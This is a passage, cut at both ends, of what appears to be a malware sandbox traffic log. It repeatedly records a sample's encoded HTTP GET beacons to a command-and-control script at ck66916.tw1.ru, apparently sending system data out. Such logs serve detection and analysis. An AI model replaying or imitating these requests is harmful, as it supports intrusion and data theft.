UZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWU